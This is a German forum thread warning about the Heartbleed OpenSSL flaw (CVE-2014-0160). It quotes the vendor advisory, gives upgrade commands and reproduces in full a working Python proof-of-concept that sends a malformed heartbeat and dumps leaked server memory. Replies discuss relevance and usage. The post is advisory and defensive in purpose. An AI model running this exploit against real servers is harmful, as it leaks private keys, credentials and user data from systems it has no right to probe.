Register for your free account! | Forgot your password?

You last visited: Today at 06:12

  • Please register to post and access all features, it's quick, easy and FREE!


[Warnung]OpenSSL Sicherheitslücke

Closed Thread
 
Old   #1
 
elite*gold: 25
Join Date: Feb 2014
Posts: 110
Received Thanks: 62
[Warnung]OpenSSL Sicherheitslücke

Ein kritischer Fehler in der Verschlüsselungssoftware OpenSSL wurde am späten Montag Abend von seinen Entdeckern öffentlich gemacht. Die Schwachstelle welche sich selber “Heartbleed” nennt, ermöglicht Angreifern, geschützte Informationen auszulesen und die Kommunikation abzugreifen. Hier kann der Server dazu gebracht werden, den privaten Schlüssel des Servers preiszugeben [ Der private Schlüssel (Private Key) liegt auf dem Server, auf welchem Dienste, welche SSL beanspruchen, genutzt werden. Nur mit dem privaten Schlüssel ist der Server in der Lage die Daten zu entschlüsseln. ]


Einer aktuellen Server Studie nach, nutzen knapp zwei-drittel aller Webserver, Software welche OpenSSL enthält, das Problem ist hier also global. Alle Versionen von 1.0.1 bis 1.0.1f eingeschlossen sind betroffen. Eine korrigierte Version 1.0.1g wurde heute veröffentlicht. Eine Warnung vom OpenSSL-Team wurde veröffentlicht :


OpenSSL Security Advisory [07 Apr 2014] ======================================== TLS heartbeat read overrun (CVE-2014-0160) ========================================== A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server. Only 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including 1.0.1f and 1.0.2-beta1. Thanks for Neel Mehta of Google Security for discovering this bug and to Adam Langley <> and Bodo Moeller <> for preparing the fix. Affected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS. 1.0.2 will be fixed in 1.0.2-beta2.


Glück gehabt haben Anwender älterer Distributionen, die noch auf OpenSSL 1.0.0 oder eine der 0.9-Versionen setzen, diese sind von dem Problem nicht betroffen.
Um zu testen ob Ihre Webseite betroffen ist, besuchen Sie bitte filippo.io



Sollten Sie hier nicht diese Meldung erhalten, müssen Sie OpenSSL aktualisieren :


Linux / Ubuntu / Debian / Fedora ...
wget
tar xfz openssl-1.0.1g.tar.gz
cd openssl-1.0.1g
./config –prefix=/usr zlib-dynamic –openssldir=/etc/ssl shared
make
sudo make install



in freebsd 10:

pkg update openssl

freebsd 9 or older:

portsnap fetch extract
cd /usr/ports/security/openssl
make reinstall clean



hier noch ein python script zum testen:

Code:
#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ()
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                  
''')

hb = h2bin(''' 
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time() 
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
        

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False

        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False

def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)

if __name__ == '__main__':
    main()



.Milo' is offline  
Thanks
3 Users
Old 04/11/2014, 21:35   #2

 
elite*gold: 0
Join Date: Nov 2010
Posts: 1,596
Received Thanks: 3,308
Those instructions are for Linux.

in freebsd 10:

pkg update openssl

freebsd 9 or older:

portsnap fetch extract
cd /usr/ports/security/openssl
make reinstall clean


.Shōgun is offline  
Thanks
4 Users
Old 04/11/2014, 21:36   #3
 
elite*gold: 20
Join Date: Aug 2012
Posts: 715
Received Thanks: 1,168
99% werden hier von nicht betroffen sein.
Erst sich selbst informieren und dann kopieren

FreeBSD bis 9.2 nutzt noch OpenSSL 0.9.8 die nicht durch den Fehler betroffen sind. Ausserdem nutzt eigentlich kein Server SSL, und SSH nutzt sein eigenes.

Gruss,
Chuck
'ChuckNorris is offline  
Thanks
8 Users
Old 04/11/2014, 21:50   #4
 
elite*gold: 0
Join Date: May 2013
Posts: 1,263
Received Thanks: 620
Ist das nicht schon seit cirka ner woche bekannt ..?
trotzdem danke


[uLow]NTX?! is offline  
Old 04/11/2014, 22:02   #5
 
elite*gold: 169
Join Date: Dec 2012
Posts: 2,571
Received Thanks: 367
was macht das in der metin2 sec? denke nicht das hier wer legale ssl zertifikate hat ...
und ssl benutzen denke ich mal eh die wenigsten aber naja
.Meep is offline  
Old 04/11/2014, 22:30   #6
 
elite*gold: 0
Join Date: Feb 2008
Posts: 2,754
Received Thanks: 1,748
Würde mich mal interessieren, woher du das wieder abkopiert hast.

Betrifft Metin2 in keinem Fall. In den Serverfiles wird 0.9.8k benutzt, FreeBSD benutzt standardmäßig auch Versionen <1.0.1.

Außerdem sollte sowieso jeder sein System regelmäßig aktualisieren - und damit ist das Problem (zumindest nach dem Neustart) auch behoben.

@.Meep:
Ist doch vollkommen egal, ob jemand "legale" Zertifikate benutzt oder nicht. Du hast die Problematik dahinter ganz offensichtlich noch nicht verstanden.

/e: Lass es doch bitte einfach bleiben.
Computerfreek is offline  
Old 04/11/2014, 22:44   #7
 
elite*gold: 169
Join Date: Dec 2012
Posts: 2,571
Received Thanks: 367
Quote:
Originally Posted by Computerfreek View Post
Würde mich mal interessieren, woher du das wieder abkopiert hast.

Betrifft Metin2 in keinem Fall. In den Serverfiles wird 0.9.8k benutzt, FreeBSD benutzt standardmäßig auch Versionen <1.0.1.

Außerdem sollte sowieso jeder sein System regelmäßig aktualisieren - und damit ist das Problem (zumindest nach dem Neustart) auch behoben.

@.Meep:
Ist doch vollkommen egal, ob jemand "legale" Zertifikate benutzt oder nicht. Du hast die ganze Problematik dahinter ganz offensichtlich noch nicht verstanden.
was das problem ist schon was es auslöst nicht juckt mich aber auch nicht tls ftw?^^ naja stimmt man brauch kein legales zertifikat und es geht auch nicht um die benutzer sondern die serverzugänge also mitm ftp client oder so?!
.Meep is offline  
Old 04/12/2014, 00:03   #8
 
elite*gold: 50
Join Date: Nov 2009
Posts: 865
Received Thanks: 1,224
Quote:
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
SyntaxError: invalid syntax
ebert.tonna is offline  
Old 04/12/2014, 00:09   #9
 
elite*gold: 25
Join Date: Feb 2014
Posts: 110
Received Thanks: 62
example : python ssltest.py -p 80
.Milo' is offline  
Old 04/12/2014, 00:40   #10
 
elite*gold: 400
Join Date: Dec 2007
Posts: 6,576
Received Thanks: 6,298
Quote:
Originally Posted by .Meep View Post
legales zertifikat
Steht das "Open" in "OpenSSL" nicht für "OpenSource"? Wofür braucht man da ne Lizens?
Mi4uric3 is offline  
Old 04/12/2014, 02:49   #11
 
elite*gold: 0
Join Date: Jan 2014
Posts: 42
Received Thanks: 18
hier könnt ihr es testen ob ihr die Lücke habt...
MrRylisma is offline  
Old 04/12/2014, 11:02   #12
 
elite*gold: 169
Join Date: Dec 2012
Posts: 2,571
Received Thanks: 367
Quote:
Originally Posted by Mi4uric3 View Post
Steht das "Open" in "OpenSSL" nicht für "OpenSource"? Wofür braucht man da ne Lizens?
Damit oben im browser steht das die n zertifikat haben
.Meep is offline  
Old 04/12/2014, 12:01   #13

 
elite*gold: 207
Join Date: Oct 2011
Posts: 7,315
Received Thanks: 7,518
Ob es fürs Kopieren auch so eine gute Anleitung dazu gab? Alle regen sich über so eine Lücke auf, nur weil Medien im Moment keine anderen Themen finden oder in Afrika einfach zu wenig los ist.
Aze /.. is offline  
Thanks
1 User
Old 04/12/2014, 12:03   #14
 
elite*gold: 3
Join Date: Apr 2012
Posts: 1,436
Received Thanks: 631
Sorry, aber was hat das mit Metin2 zu tun?

Nur weil hier viele Webseitenbetreiber sind? - Demnach poste es doch auch in den unzähligen Sektionen, wo sich auch Webseitenbetreiber aufhalten.


Regards
Anti™ is offline  
Old 04/12/2014, 12:16   #15
 
elite*gold: 0
Join Date: Apr 2014
Posts: 37
Received Thanks: 58
Die lücke ist mir zumindest schon 2 Jahre bekannt also nichts neues. Gibt mehr als nur die eine.


5up3rr is offline  
Thanks
1 User
Closed Thread



« [RELEASE][LIB]Drop item every 3 seconds. | [RELEASE] Account Sicherheitsban »

Similar Threads
OpenSSL
04/03/2014 - Technical Support - 7 Replies
Hey, Ich brauche diese OpenSSL Version für Windows: 1.0.1.E Wo krieg ich die her? Find die leider nicht :( Gibt es nur für Linux, die kann ich ja nicht nehmen für Windows?!
Problem with OpenSSL
10/31/2012 - CO2 PServer - Discussions / Questions - 2 Replies
Hello mates, I'm currently having trouble with running Arco Online's source, I wanted to go through it and check it out but sadly there's something wrong, This is the only source that refuses to run, I've attached the error I'm having at the bottom, I'm currently running on a x64 bit operating system, But I forced the project to run in 32x mode, And replaced the libeay32.dll, I also got everything configured correctly, I wish there's anyone that could atleast guide me to fix it as I've been...
Openssl
08/29/2012 - C/C++ - 5 Replies
Ich versuche gerade mithilfe von OpenSSL RSA in C++ zu benutzen. Ich habe es von der Homepage runtergeladen und mein Problem ist jetzt, dass ich dort nur Headerdatein, aber keine dazugehörigen cpp Dateien finde Ich hoffe ihr könnt mir helfen
[SICHERHEITSLÜCKE]SSH/Metin2 Sicherheitslücke
08/18/2011 - Metin2 PServer Guides & Strategies - 26 Replies
Hey, ich will hier mal eine Sicherheitslücke in SSH die man über Metin2 erreicht releasen. Aber damit das nicht geleecht wird, habe ich es encrypted. Schreibt mich an, dann sag ich euch wie ihr es entschlüsselt! ...



All times are GMT +1. The time now is 06:12.


Powered by vBulletin®
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Abuse
Copyright ©2018 elitepvpers All Rights Reserved.